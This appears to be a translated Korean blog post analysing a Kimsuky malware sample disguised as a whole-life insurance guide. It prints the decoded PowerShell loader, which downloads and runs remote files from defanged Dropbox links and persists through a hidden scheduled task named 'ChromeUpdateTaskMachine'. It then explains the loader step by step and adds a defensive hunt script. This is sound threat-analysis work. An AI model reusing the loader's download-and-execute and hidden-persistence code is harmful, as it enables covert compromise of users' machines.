꿈을꾸는 파랑새

Today I am writing about a piece of malware made by the North Korean hacking group Kimsuky that is disguised as a whole-life insurance guide (종신안내장): 종신안내장v02_곽X환d.zip (2025.2.5). It is made to look like a PDF file, but it is actually not a PDF at all, just a shortcut (link) file. The hash values of the malware are as follows.
File name: 종신안내장v02_곽X환d.zip
Size: 6,427 bytes
MD5: 40837012253331958723dda63fdfabff
SHA-256: 079907b7feab3673a1767dbfbc0626e656f5d3b03b6cff471cc7cf8a1973ab34

Base64 code contained in the malware

Base64 encoding


Base64 decoding

$hhh = Join-Path ([System.IO.Path]::GetTempPath()) "종신안내장V02_곽x환D.pdf.pdf";
wget -Uri "hxxps://dl(.)dropboxusercontent(.)com/scl/fi/lc7j7be3vtd2f3hadv0bz/V02_-D.pdf.pdf?rlkey=wnah9edf39vv8va7gvmodymch&st=64lizr6k&dl=0" -OutFile $hhh;
& $hhh;
$ppp = Join-Path ($env:AppData) "chrome.ps1";
$str = '$aaa = Join-Path ($env:AppData) "temp.ps1"; wget -Uri "hxxps://dl(.)dropboxusercontent(.)com/scl/fi/gs58u6qvvxorzttv09yvt/kxsxhx-x.txt?rlkey=v86pd7i2njm70pfutl0knu68&st=gjvdcw8r&dl=0" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force;';
$str | Out-File -FilePath $ppp -Encoding UTF8;
$action = New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument '-WindowStyle Hidden -nop -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "& {$abc = Join-Path ($env:AppData) \"chrome.ps1\"; & $abc;}"';
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30);
$settings = New-ScheduledTaskSettingsSet -Hidden;
Register-ScheduledTask -TaskName "ChromeUpdateTaskMachine" -Action $action -Trigger $trigger -Settings $settings;
$aaa = Join-Path ($env:AppData) "system_first.ps1";
wget -Uri "hxxps://dl(.)dropboxusercontent(.)com/scl/fi/sumch8o12a4ko7wqqtrgo/kxsxhx-f.txt?rlkey=i8yto5xg3unffs9wawhytu1v4&st=rek9dgcl&dl=0" -OutFile $aaa;
& $aaa;
Remove-Item -Path $aaa -Force;

Decoding the Base64 with CyberChef

Code analysis

1. Join-Path ([System.IO.Path]::GetTempPath()) "종신안내장V02_곽x환D.pdf.pdf"
   Sets the path under the Temp folder where 종신안내장V02_곽X환D.pdf.pdf will be saved.
   Downloads a file named V02_-D.pdf.pdf from Dropbox and saves it to the Temp folder.
   Runs the file it has just downloaded.
2. Chooses a path in the AppData folder (the user data folder) where a malicious script named chrome.ps1 will be saved.
   Stores the following in the $str variable:
   download a file named temp.ps1 from Dropbox;
   run the downloaded temp.ps1 and delete it immediately after it runs.
   Writes that content to the chrome.ps1 file.
3. Runs PowerShell in hidden mode (-WindowStyle Hidden).
   Includes the command that runs chrome.ps1.
   New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30)
   The first run happens 5 minutes later, after which the malware repeats every 30 minutes.
   Registered in Task Scheduler under the name ChromeUpdateTaskMachine,
   which means it keeps running even after the computer is rebooted.
   Downloads system_first.ps1 from Dropbox, runs it, and deletes it.
By the time I ran this file, the Dropbox share had already been taken down, so the file could not be retrieved and no further analysis is possible.
In any case, judging by the title alone, I suspect the malware was built after breaking into someone's personal computer or laptop.
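The following is an added example, not code from the sample or from the original post. It is a PowerShell hunt that checks a Windows machine for the persistence pattern described above: a scheduled task launching hidden PowerShell with execution-policy bypass from a script under %AppData%. The task name and script file names come from this sample; the argument patterns it matches on are assumptions chosen for this example, not indicators from the sample.

```powershell
# Hunt for the scheduled-task persistence pattern described in the post.
# Task/script names are taken from the analyzed sample; the argument
# patterns are assumptions for this example, not indicators from it.
$knownTaskName = 'ChromeUpdateTaskMachine'
$knownScripts  = @('chrome.ps1', 'temp.ps1', 'system_first.ps1')
$appData       = [Environment]::GetFolderPath('ApplicationData')

$findings = foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
    foreach ($action in $task.Actions) {
        # Non-exec actions (COM handlers etc.) have no Execute value; skip them.
        $exe     = [string]$action.Execute
        $argLine = [string]$action.Arguments
        if ($exe -notmatch 'powershell') { continue }

        $reasons = @()
        if ($task.TaskName -eq $knownTaskName)           { $reasons += 'known task name' }
        if ($argLine -match '-WindowStyle\s+Hidden')     { $reasons += 'hidden window' }
        if ($argLine -match '-ExecutionPolicy\s+Bypass') { $reasons += 'policy bypass' }
        if ($argLine -match 'AppData')                   { $reasons += 'script under AppData' }
        if ($reasons.Count -eq 0) { continue }

        # Report the repetition interval too: the sample used PT30M (every 30 minutes).
        [pscustomobject]@{
            TaskName = $task.TaskName
            Path     = $task.TaskPath
            Execute  = $exe
            Repeat   = ($task.Triggers | ForEach-Object { $_.Repetition.Interval }) -join ','
            Reasons  = ($reasons -join ', ')
        }
    }
}

# Check whether any of the dropped script names are still present in %AppData%
# (the sample deletes temp.ps1 and system_first.ps1 after running; chrome.ps1 stays).
$droppedFiles = foreach ($name in $knownScripts) {
    $p = Join-Path $appData $name
    if (Test-Path $p) { Get-Item $p | Select-Object FullName, Length, LastWriteTime }
}

$findings     | Format-Table -AutoSize
$droppedFiles | Format-Table -AutoSize
```

Get-ScheduledTask needs the ScheduledTasks module (Windows 8 / Server 2012 and later), and tasks registered by other users are only visible when run from an elevated prompt.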
